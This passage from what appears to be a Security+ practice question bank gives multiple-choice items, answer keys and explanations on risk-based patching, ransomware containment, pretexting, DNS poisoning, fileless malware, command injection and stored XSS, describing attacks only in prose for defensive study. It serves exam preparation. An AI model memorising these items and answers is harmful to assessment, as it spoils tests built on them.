Finding 1 should be remediated first because it combines high severity with an internet-facing attack surface and a known exploit, meaning an attacker can remotely compromise the VPN appliance without authentication or compensating controls. This creates an immediate and direct risk of network breach, unlike the other findings which require local access or are isolated from external threats.
Exam trap
The trap here is that candidates prioritize by severity alone (Critical > High) without considering the attack vector, exploitability, and network exposure, which are key to risk-based prioritization in the SY0-701 exam.
How to eliminate wrong answers
Option B is wrong because although the severity is critical, the vulnerability requires authenticated local access, meaning an attacker must already have a foothold inside the network, making it less urgent than an internet-facing exploit. Option C is wrong because medium severity on a test server with no public exploit and no external reachability poses minimal immediate risk, as exploitation requires both access and a custom attack. Option D is wrong because severity rating alone does not determine priority; factors like exposure, exploit availability, and compensating controls must be considered in risk-based remediation.
A threat report says an attacker changes domains daily and rehosts infrastructure in cloud VPS environments, but the phishing email wording, login-page flow, and PowerShell download behavior remain the same. What type of information is most useful for a durable detection rule?
A.Only the current malware hash from the latest sample
B.The attacker’s behavioral pattern and technique sequence
C.The names of the victim company’s departments
D.A screenshot of the phishing email subject line only
AnswerB
Technique-based indicators are more durable because the attacker can rotate infrastructure without changing core behavior.
Why this answer
Option B is correct because the attacker's behavioral pattern and technique sequence remain consistent even as infrastructure changes. A durable detection rule should focus on the invariant TTPs (Tactics, Techniques, and Procedures) such as the phishing email wording, login-page flow, and PowerShell download behavior, which are stable indicators of compromise (IOCs) that persist across domain and IP changes. This aligns with the MITRE ATT&CK framework's emphasis on detecting adversary behaviors rather than ephemeral artifacts like hashes or IP addresses.
Exam trap
CompTIA often tests the misconception that static IOCs like hashes or subject lines are reliable for detection, when in fact behavioral patterns and technique sequences provide durable detection against rapidly changing infrastructure.
How to eliminate wrong answers
Option A is wrong because malware hashes change with each new sample, making them ephemeral IOCs that cannot provide durable detection when the attacker rehosts infrastructure daily. Option C is wrong because victim company department names are irrelevant to the attacker's technical behavior and do not help detect the phishing or download sequence. Option D is wrong because a screenshot of the phishing email subject line is a static, easily changed artifact that does not capture the invariant login-page flow or PowerShell download behavior.
A workstation opens an attachment labeled as an invoice and then begins creating scheduled tasks, disabling security services, and contacting a known malicious IP address. What is the best first containment action?
A.Run a full antivirus scan while leaving the system connected
B.Isolate the workstation from the network using the EDR containment feature
C.Reboot the workstation to clear any active malicious processes
D.Uninstall the email client that delivered the attachment
AnswerB
EDR-based isolation stops command-and-control traffic and limits further spread while preserving the system for investigation.
Why this answer
Option B is correct because the workstation is actively communicating with a known malicious IP address and disabling security services, indicating an active compromise. Isolating the workstation via EDR containment immediately stops the outbound command-and-control traffic and prevents lateral movement, which is the priority first step in incident response before any remediation or analysis.
Exam trap
The trap here is that candidates often choose to run an antivirus scan or reboot first, thinking they can clean the infection, but the exam emphasizes that containment (stopping the spread and C2) is the immediate priority over remediation or removal.
How to eliminate wrong answers
Option A is wrong because running a full antivirus scan while the system is still connected to the network does not stop ongoing malicious activity, such as C2 communication or scheduled task creation, and may allow the malware to spread. Option C is wrong because rebooting the workstation may clear active processes but does not remove persistence mechanisms like scheduled tasks, and the malware could re-establish contact with the C2 server upon reboot, while also losing volatile forensic data. Option D is wrong because uninstalling the email client does not address the active compromise already in progress; the malware is already executing and communicating, so removing the delivery vector is irrelevant to immediate containment.
A user's laptop suddenly shows encrypted .docx files, a ransom note, and the EDR console reports mass file renames and shadow copy deletion. The device is still online and connected to the corporate VPN. What is the best immediate action?
A.Reboot the laptop into safe mode and attempt manual malware removal.
B.Quarantine the endpoint from the network through EDR or physical isolation.
C.Restore the affected files from backup before taking any other action.
D.Tell the user to change their password and continue working from the same laptop.
AnswerB
Isolating the system immediately contains the ransomware, limits lateral spread, and preserves the device for later investigation. Because the host is still connected to the VPN, it could continue encrypting mapped drives or reach other systems. Containment comes before eradication or recovery, especially when destructive behavior is still active.
Why this answer
Option B is correct because the immediate priority in a confirmed ransomware incident is to contain the threat by isolating the compromised host from the network. The EDR console showing mass file renames and shadow copy deletion indicates active encryption and lateral movement risk. Quarantining via EDR or physically disconnecting the network cable stops the ransomware from encrypting additional shares or communicating with its C2 server, preserving evidence and preventing further damage.
Exam trap
The trap here is that candidates may choose to restore from backups (Option C) first, not realizing that the infected host must be isolated before any recovery attempt to prevent immediate re-encryption of restored files.
How to eliminate wrong answers
Option A is wrong because rebooting into safe mode and attempting manual malware removal is a forensic step that should only occur after containment; it risks the ransomware continuing to encrypt files during the reboot process and does not stop network propagation. Option C is wrong because restoring files from backup before isolating the endpoint could allow the ransomware to re-encrypt the restored files if the host is still online, and it may also overwrite critical forensic evidence. Option D is wrong because telling the user to change their password and continue working ignores the active encryption and allows the ransomware to spread to network shares and other systems via the VPN connection, violating incident response containment principles.
A caller says they are from the help desk and need the employee's MFA code to "complete a password reset". Which social engineering technique is being used?
A.Phishing
B.Pretexting
C.DDoS
D.SQL injection
AnswerB
The caller is inventing a believable story and role to trick the employee into revealing a secret code.
Why this answer
Pretexting is a social engineering technique where an attacker fabricates a scenario (the pretext) to trick a victim into divulging sensitive information. In this case, the attacker pretends to be from the help desk and invokes a false password reset procedure to obtain the employee's MFA code, which should never be shared. The MFA code is a time-based one-time password (TOTP) or push notification response that authenticates the user, not a tool for password resets.
Exam trap
The trap here is that candidates may confuse pretexting with phishing because both involve deception, but pretexting relies on a fabricated identity and scenario (often via phone or in-person) rather than a malicious electronic message.
How to eliminate wrong answers
Option A is wrong because phishing typically involves sending fraudulent emails or messages that contain malicious links or attachments to steal credentials or install malware, not a direct phone call requesting an MFA code under a false pretext. Option C is wrong because a DDoS (Distributed Denial of Service) attack is a network-level attack that overwhelms a target server with traffic to disrupt services, and it has no relation to social engineering or obtaining an MFA code via impersonation.
Users on the internal Wi-Fi report that the finance portal suddenly resolves to a different IP address, and the browser shows a fake login page that closely matches the real site. The DNS resolver cache on the network also contains unexpected entries for that host name. What attack is most likely?
A.ARP spoofing, because the attacker is changing the MAC address used on the local network.
B.DNS poisoning, because the attacker has corrupted name resolution so users are sent to a malicious destination.
C.Port scanning, because the attacker is probing internal services for open ports.
D.Denial-of-service, because the attacker is overwhelming the portal with traffic.
AnswerB
DNS poisoning fits the evidence because the resolver cache contains bad entries and users are being directed to a fake site through altered name resolution. That lets the attacker redirect traffic without changing the user’s bookmarks or typing habits.
Why this answer
B is correct because DNS poisoning (also known as DNS cache poisoning) directly corrupts the name resolution process, causing the finance portal's hostname to resolve to a malicious IP address. The presence of unexpected DNS resolver cache entries for that hostname confirms that the attack targeted the DNS infrastructure, not the ARP table or network availability.
Exam trap
The trap here is that candidates confuse ARP spoofing with DNS poisoning because both can redirect traffic, but ARP spoofing operates at Layer 2 and does not affect DNS resolver cache entries, whereas DNS poisoning directly corrupts the name resolution database.
How to eliminate wrong answers
Option A is wrong because ARP spoofing manipulates MAC-to-IP mappings at Layer 2, not DNS cache entries; it would cause traffic interception on the local subnet but would not explain unexpected DNS resolver cache entries. Option C is wrong because port scanning is a reconnaissance technique used to discover open ports and services, not a method to redirect users to a fake login page or corrupt DNS records. Option D is wrong because a denial-of-service attack aims to overwhelm a service with traffic to make it unavailable, not to alter DNS resolution or present a fake login page.
A vulnerability scan finds two issues: a critical deserialization flaw on a non-production lab server behind a VPN, and a high-severity privilege escalation flaw on the production jump server that administrators use to reach the rest of the environment. Which should be remediated first?
A.The lab server flaw, because critical severity always comes first
B.The jump server flaw, because it affects a production administrative access point
C.Neither issue, because VPN access reduces the need for urgent remediation
D.The lab server flaw, because non-production systems are always easier to patch later
AnswerB
A vulnerable jump server can provide broad access to the environment, so its risk is higher despite the lower severity label.
Why this answer
The jump server flaw must be remediated first because it is a high-severity privilege escalation vulnerability on a production system that administrators use as a gateway to the entire environment. Compromise of this jump server would give an attacker administrative access to all connected production systems, making the business impact far greater than the critical deserialization flaw on an isolated non-production lab server. In risk-based prioritization, severity alone is insufficient; the asset's role, exposure, and potential blast radius must be considered.
Exam trap
The trap here is that candidates fixate on CVSS severity scores (critical vs. high) without considering the asset's context, such as whether it is a production system, its role in the network architecture, and the potential for lateral movement, which CompTIA emphasizes in risk management and prioritization scenarios.
How to eliminate wrong answers
Option A is wrong because it incorrectly assumes that CVSS critical severity always dictates remediation priority, ignoring that the lab server is non-production, isolated behind a VPN, and does not handle sensitive data or provide access to production systems. Option C is wrong because VPN access does not eliminate the risk of compromise; an attacker who gains access to the VPN (e.g., via stolen credentials or a client-side exploit) could still reach the jump server, and the jump server's privilege escalation flaw would then allow lateral movement to all production assets. Option D is wrong because it suggests deferring remediation on non-production systems, but the critical deserialization flaw on the lab server could still be exploited if an attacker reaches it (e.g., via VPN or insider threat), and patching it is typically easier and lower risk than patching production systems, so it should be remediated promptly but not before the higher-impact production jump server flaw.
A SOC analyst sees repeated encoded PowerShell launched by mshta.exe. No new executable is written to disk, but the host makes periodic outbound connections to the same IP. Which malware characteristic is most likely?
A.Fileless attack, because the malicious activity lives in memory and uses built-in tools.
B.Worm, because the host is making outbound connections to a remote system.
C.Spyware, because the host is communicating with an external IP address.
D.Rootkit, because the system tools are being hidden from the user.
AnswerA
Fileless attacks commonly abuse legitimate system utilities and leave little or no executable on disk. The use of PowerShell and mshta.exe strongly suggests living-off-the-land behavior designed to evade basic file-based detection.
Why this answer
The scenario describes encoded PowerShell commands executed by mshta.exe without writing a new executable to disk, which is a classic fileless attack technique. Fileless malware operates entirely in memory, leveraging legitimate system tools (like PowerShell and mshta) to evade traditional antivirus detection, and the outbound connections are for command-and-control (C2) communication, not for self-propagation or data theft.
Exam trap
The trap here is that candidates see 'outbound connections' and immediately think of a worm or spyware, but the key differentiator is the lack of a written executable and the use of built-in tools in memory, which defines a fileless attack.
How to eliminate wrong answers
Option B is wrong because a worm self-propagates across networks without user interaction, but the description only shows outbound connections to a single IP, not scanning or spreading to other hosts. Option C is wrong because spyware specifically steals user data (e.g., keystrokes, files) and typically exfiltrates to a C2 server, but the question focuses on the execution method (memory-resident) and does not indicate data collection. Option D is wrong because a rootkit hides system objects (files, processes, registry keys) from the OS, but the scenario does not mention any concealment of tools or persistence mechanisms; it simply shows a process (mshta.exe) running PowerShell in memory.
A report generator accepts a user-supplied report name and then passes it into a shell command to convert a file. During testing, a malicious value causes the server to run an unexpected system command. Which two changes best mitigate this issue while keeping the feature usable? Select two.
Select 2 answers
A.Replace shell command concatenation with a parameterized API or safe library call.
B.Apply strict server-side allowlist validation to the report name before processing.
C.HTML-encode the report name before inserting it into the shell command.
D.Switch the feature from POST to GET so the values are easier to inspect.
E.Hide the server error messages so attackers cannot see the failure details.
AnswersA, B
Avoiding direct shell invocation removes the attacker-controlled command injection path. A safe API or library call passes data as data instead of executable syntax. This is the most effective fix because it eliminates the dangerous pattern rather than trying to filter every possible payload.
Why this answer
Option A is correct because replacing shell command concatenation with a parameterized API or safe library call prevents command injection by ensuring user input is treated as data, not executable code. This is the most effective mitigation because it eliminates the injection vector entirely, rather than trying to sanitize or validate input that may still be passed to a shell interpreter.
Exam trap
The trap here is that candidates often choose HTML encoding (Option C) thinking it sanitizes all injection types, but HTML encoding only prevents XSS, not command injection, which requires shell-specific escaping or, better, avoiding shell invocation altogether.
A security analyst is investigating a series of alerts from the web application firewall. Users are reporting that when they view a product review page on the company's e-commerce site, their browser automatically redirects to a malicious website. The analyst examines the database and finds that a product review submitted by a user contains a <script> tag that loads a JavaScript file from an external domain. Which type of attack has occurred?
A.Cross-site request forgery (CSRF)
B.Stored cross-site scripting (XSS)
C.SQL injection
D.Reflected cross-site scripting (XSS)
AnswerB
This is correct. The injected script is permanently stored in the database (in the product review) and executes when other users view the page, which is the defining characteristic of stored (persistent) XSS.
Why this answer
The attack is stored cross-site scripting (XSS) because the malicious <script> tag was permanently stored in the product review database. When any user views the product review page, the browser loads and executes the external JavaScript file from the attacker's domain, causing an automatic redirect to a malicious website. This matches the classic stored XSS pattern where payload persists in server-side storage and executes in the victim's browser context.
Exam trap
The trap here is confusing stored XSS with CSRF because both involve user interaction and redirects, but stored XSS is about injecting persistent client-side code, while CSRF forges requests without injecting scripts.
How to eliminate wrong answers
Option A is wrong because cross-site request forgery (CSRF) tricks an authenticated user into performing unintended actions on a trusted site, not injecting client-side scripts that execute in the browser. Option C is wrong because SQL injection targets the database layer by manipulating SQL queries to extract or modify data, not by injecting HTML/JavaScript that executes in the user's browser.